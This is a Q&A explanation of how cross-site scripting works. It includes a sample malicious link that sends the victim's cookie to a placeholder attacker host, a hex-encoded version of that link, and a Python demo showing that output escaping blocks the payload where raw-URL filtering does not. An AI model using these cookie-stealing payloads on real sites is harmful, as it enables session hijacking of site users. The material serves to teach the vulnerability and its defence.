How does XSS work?


Question

Can someone explain how XSS works in plain English? Maybe with an example. Googling didn't help much.

Recommended answer

Cross Site Scripting basically is a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a Web site. The most usual case of this vulnerability occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim's cookie away to another server, or it can modify the affected site, injecting forms, to steal usernames and passwords, and other phishing techniques.

Example of a malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

http://VulnerableHost/a.php?variable=%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%41%74%74%61%63%6B%65%72%73%48%6F%73%74%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%2E%63%67%69%3F%20%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
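As an added illustration (not part of the original answer), here is a small Python model of the a.php echo described above, using a constructed, harmless <script>alert(1)</script> probe in place of the cookie-stealing payload. It shows why the hex-encoded link works just as well as the plain one: the web server percent-decodes the GET variable before the script ever sees it, so a check on the raw URL misses the encoded form, whereas HTML-escaping the value at output time neutralises both.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample links, modelled on the page's a.php?variable=... example.
PROBE = "<script>alert(1)</script>"
PLAIN_URL = "http://VulnerableHost/a.php?variable=" + PROBE
# Same probe, percent-encoded byte by byte as in the page's second link.
HEX_URL = ("http://VulnerableHost/a.php?variable="
           "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29"
           "%3C%2F%73%63%72%69%70%74%3E")


def get_variable(url: str) -> str:
    """Return the 'variable' query parameter as the server hands it to a.php:
    percent-decoding has already been applied, so both links yield the same text."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("variable", [""])[0]


def raw_url_filter_blocks(url: str) -> bool:
    """A naive filter that inspects the still-encoded URL. It catches the plain
    link but not the hex-encoded one, which is why such filters are not a fix."""
    return "<script" in url.lower()


def render_vulnerable(value: str) -> str:
    """Echoes the GET variable straight into the HTML: the reflected XSS bug."""
    return f"<p>You searched for: {value}</p>"


def render_safe(value: str) -> str:
    """Escapes <, >, &, and quotes at output time, so the browser can only
    display the value as text and never parse it as markup."""
    return f"<p>You searched for: {html.escape(value, quote=True)}</p>"


def contains_script_tag(page: str) -> bool:
    """True if the rendered HTML still contains a live <script> opening tag."""
    return "<script" in page.lower()


if __name__ == "__main__":
    for url in (PLAIN_URL, HEX_URL):
        value = get_variable(url)
        print("raw-URL filter blocks:", raw_url_filter_blocks(url))
        print("vulnerable executes:  ", contains_script_tag(render_vulnerable(value)))
        print("escaped executes:     ", contains_script_tag(render_safe(value)))
```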
